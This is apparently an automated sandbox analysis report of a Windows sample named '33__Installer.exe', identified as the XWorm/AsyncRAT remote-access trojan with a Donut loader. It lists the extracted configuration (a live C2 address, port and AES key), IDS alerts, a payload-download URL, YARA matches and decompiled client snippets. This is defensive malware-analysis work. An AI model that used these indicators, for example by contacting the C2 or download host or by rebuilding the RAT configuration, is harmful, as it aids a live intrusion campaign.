Source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Xworm {"C2 url": ["117.41.184.33"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"} |
Source: 33__Installer.exe |
ReversingLabs: Detection: 26% |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: 33__Installer.exe |
Joe Sandbox ML: detected |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: 117.41.184.33 |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: 7000 |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: <123456789> |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: <Xwormmm> |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: XWorm V5.6 |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack |
String decryptor: USB.exe |
Source: 33__Installer.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: 33__Installer.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: Traffic |
Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 117.41.184.33:7000 -> 192.168.2.4:49731 |
Source: Traffic |
Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 117.41.184.33:7000 -> 192.168.2.4:49731 |
Source: Traffic |
Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49731 -> 117.41.184.33:7000 |
Source: Traffic |
Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49731 -> 117.41.184.33:7000 |
Source: Traffic |
Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49731 -> 117.41.184.33:7000 |
Source: Malware configuration extractor |
URLs: 117.41.184.33 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 881 |
Source: unknown |
Network traffic detected: HTTP traffic on port 881 -> 49730 |
Source: global traffic |
TCP traffic: 192.168.2.4:49730 -> 91.208.240.157:881 |
Source: global traffic |
TCP traffic: 192.168.2.4:49731 -> 117.41.184.33:7000 |
Source: Joe Sandbox View |
ASN Name: CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 117.41.184.33 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C23910 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetReadFile,InternetCloseHandle,std::ios_base::_Ios_base_dtor,InternetCloseHandle, |
0_2_00C23910 |
Source: global traffic |
HTTP traffic detected: GET /330.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache |
Source: global traffic |
DNS traffic detected: DNS query: guanlix.cn |
Source: 33__Installer.exe |
String found in binary or memory: http://guanlix.cn:881/330.ccp |
Source: 33__Installer.exe, 00000000.00000002.4105093119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://guanlix.cn:881/330.ccp&( |
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: dump.pcap, type: PCAP |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process Stats: CPU usage > 49% |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C301C9 |
0_2_00C301C9 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C359E9 |
0_2_00C359E9 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C309FC |
0_2_00C309FC |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C311B6 |
0_2_00C311B6 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C36B67 |
0_2_00C36B67 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C3648B |
0_2_00C3648B |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C30DCE |
0_2_00C30DCE |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C3065E |
0_2_00C3065E |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C37E2F |
0_2_00C37E2F |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C35F3A |
0_2_00C35F3A |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_0617A010 |
0_2_0617A010 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_06174E68 |
0_2_06174E68 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_06177CB0 |
0_2_06177CB0 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_06175B40 |
0_2_06175B40 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_0617E920 |
0_2_0617E920 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_061707A0 |
0_2_061707A0 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_06174B20 |
0_2_06174B20 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: String function: 00C2AF90 appears 45 times |
|
Source: 33__Installer.exe, 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenamewindos.exe. vs 33__Installer.exe |
Source: 33__Installer.exe, 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameXClient.exe4 vs 33__Installer.exe |
Source: 33__Installer.exe |
Binary or memory string: OriginalFilenamewindos.exe. vs 33__Installer.exe |
Source: 33__Installer.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: dump.pcap, type: PCAP |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, AlgorithmAES.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: classification engine |
Classification label: mal100.troj.evad.winEXE@1/2@1/2 |
Source: C:\Users\user\Desktop\33__Installer.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Mutant created: NULL |
Source: C:\Users\user\Desktop\33__Installer.exe |
Mutant created: \Sessions\1\BaseNamedObjects\20UmI84cKfMqQ1HH |
Source: 33__Installer.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\33__Installer.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: 33__Installer.exe |
ReversingLabs: Detection: 26% |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: avicap32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: msvfw32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Jump to behavior |
Source: 33__Installer.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: 33__Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: 33__Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: 33__Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: 33__Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: 33__Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs |
.Net Code: Plugin System.AppDomain.Load(byte[]) |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs |
.Net Code: Memory System.AppDomain.Load(byte[]) |
Source: 0.2.33__Installer.exe.6160000.1.raw.unpack, Messages.cs |
.Net Code: Memory |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C345F4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
0_2_00C345F4 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C27059 push ecx; ret |
0_2_00C2706C |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C26004 push dword ptr [ecx-75h]; iretd |
0_2_00C26011 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C316CD push 00000008h; ret |
0_2_00C316CF |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C316E9 push cs; ret |
0_2_00C316F7 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C316F8 push es; ret |
0_2_00C316FF |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C2AFD5 push ecx; ret |
0_2_00C2AFE8 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_061770F8 pushad ; iretd |
0_2_06177105 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 881 |
Source: unknown |
Network traffic detected: HTTP traffic on port 881 -> 49730 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\33__Installer.exe |
Memory allocated: 3D70000 memory reserve | memory write watch |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Memory allocated: 4020000 memory reserve | memory write watch |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Memory allocated: 3E50000 memory reserve | memory write watch |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Window / User API: threadDelayed 2052 |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
Window / User API: threadDelayed 7787 |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe TID: 5920 |
Thread sleep time: -23980767295822402s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe TID: 5328 |
Thread sleep count: 2052 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe TID: 5328 |
Thread sleep count: 7787 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
File Volume queried: C:\ FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\33__Installer.exe |
File Volume queried: C:\ FullSizeInformation |
Jump to behavior |
Source: 33__Installer.exe, 00000000.00000002.4105093119.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 33__Installer.exe, 00000000.00000002.4105093119.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, 33__Installer.exe, 00000000.00000002.4105093119.00000000014DA000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: C:\Users\user\Desktop\33__Installer.exe |
API call chain: ExitProcess graph end node |
Source: C:\Users\user\Desktop\33__Installer.exe |
API call chain: ExitProcess graph end node |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C2AD72 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00C2AD72 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C345F4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
0_2_00C345F4 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_03CB1628 mov eax, dword ptr fs:[00000030h] |
0_2_03CB1628 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C37B91 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, |
0_2_00C37B91 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C2CD6D SetUnhandledExceptionFilter, |
0_2_00C2CD6D |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C2AD72 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00C2AD72 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Code function: 0_2_00C26FE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00C26FE1 |
Source: C:\Users\user\Desktop\33__Installer.exe |
Memory allocated: page read and write | page guard |
Jump to behavior |
